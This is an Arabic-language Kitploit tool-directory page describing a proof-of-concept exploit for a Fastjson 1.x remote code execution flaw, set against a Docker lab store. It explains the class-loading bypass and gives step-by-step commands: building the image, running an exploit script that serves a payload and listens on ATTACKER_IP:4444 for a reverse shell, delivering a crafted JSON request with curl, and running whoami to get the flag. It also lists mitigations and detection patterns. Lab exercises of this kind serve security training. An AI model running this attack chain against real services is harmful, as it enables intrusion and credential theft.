Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-16723 — استغلال PoC لثغرة RCE في Fastjson (CVE-2026-16723) يتضمن توليد حمولة JAR تلقائيًا وتسليمها عبر JSON مُصمَّم خصيصًا، متجاوزًا قيود AutoType. | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2026-16723
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمالفريق الأحمرتطوير الحمولات
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

استغلال PoC لثغرة RCE في Fastjson (CVE-2026-16723) يتضمن توليد حمولة JAR تلقائيًا وتسليمها عبر JSON مُصمَّم خصيصًا، متجاوزًا قيود AutoType.

عرض المستودع
1منذ 22 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


نظرة عامة

CVE-2026-16723 هي ثغرة تنفيذ أكواد عن بُعد (RCE) في Fastjson 1.x (1.2.68 – 1.2.83). عندما يقوم Fastjson بتحليل JSON يتحكم فيه المهاجم، يتم تحويل قيمة @type معدّة إلى استعلام عن مورد فئة داخل checkAutoType. في ملف Spring Boot القابل للتنفيذ fat-JAR، يحلّ مُحمّل الفئات هذا الاسم كعنوان jar:http:// ويجلب JAR بعيد (SSRF)، ثم يحمّل فئة تحمل تعليق @JSONType حتى مع تعطيل AutoType. نظرًا لأن JDK / Tomcat الحديث يرفض الاسم الثنائي jar:http://، فإن المتغير الموثوق يقوم بتخزين JAR في ذاكرة JVM المؤقتة ويعيد قراءته عبر jar:file:/proc/self/fd/N، بحيث يتم تعريف الفئة وتنفيذ المُهيّئ الثابت الخاص بها، مما يتيح تنفيذ الأكواد. يبقى AutoType معطًلا ولا يلزم وجود أداة classpath.


الإصدارات المتأثرة

التصنيفالإصدار
قابلة للاستغلالFastjson 1.2.68 ≤ الإصدار ≤ 1.2.83
مصحّحةالانتقال إلى Fastjson 2.x (لا يوجد إصدار 1.x مُصحّح)

التأثير

  • تنفيذ أكواد عن بُعد بصلاحية حساب الخدمة
  • الكشف عن الأسرار / بيانات الاعتماد من المضيف والبيئة
  • اختراق كامل للتطبيق المتأثر

البيئة

الهدف المخبري هو متجر عام (Northwind Store) واجهة البحث الخاصة به تربط نص الطلب باستخدام Fastjson. جميع الإعدادات هي الافتراضية الأصلية في Fastjson: SafeMode معطّل، AutoType معطّل، ويُعبّأ كملف Spring Boot fat-JAR.

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
المتطلب المسبقالحالة في هذا المختبر
Fastjson 1.2.68 – 1.2.831.2.83
Spring Boot fat-JAR قابل للتنفيذنعم
مسار تحليل JSON بدون مصادقةPOST /api/products/search
SafeMode / AutoTypeالافتراضي (كلاهما معطّل)

إثبات الاختراق (PoC)

يعمل المهاجم والهدف على نفس شبكة Docker bridge، لذلك يصل الهدف إلى المهاجم كاتصال صادر (لا يتم نشر أي منفذ إضافي).

الخطوة 1: تأكيد أن الهدف يعمل

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

الخطوة 2: تشغيل الاستغلال على جهاز المهاجم

exploit.py يبني JAR الحمولة، ويخدمها، ويشغّل مستمعًا، ويطبع نص الطلب. مطلوب فقط عنوان الاستدعاء.

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

الخطوة 3: تسليم الحمولة

الصق النص المطبوع في نقطة البحث (Burp Repeater أو curl) ثم أرسله. طلب البحث هو ميزة عادية؛ فقط نص JSON الخاص به مصنوع بعناية.

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

الخطوة 4: تأكيد النتيجة

يعمل الكود بصلاحية حساب الخدمة. استرجع العلم عبر الصدفة التي تم الحصول عليها:

root@kitploit:~
whoami

التخفيف

  • الانتقال إلى Fastjson 2.x
  • أو تشغيل com.alibaba:fastjson:1.2.83_noneautotype
  • أو تشغيل JVM مع -Dfastjson.parser.safeMode=true
  • الكشف: قيم @type في JSON تحتوي على jar:http أو jar:file / أنماط /proc/self/fd

التحليل

  • KR:
  • EN:
تنزيل الأداة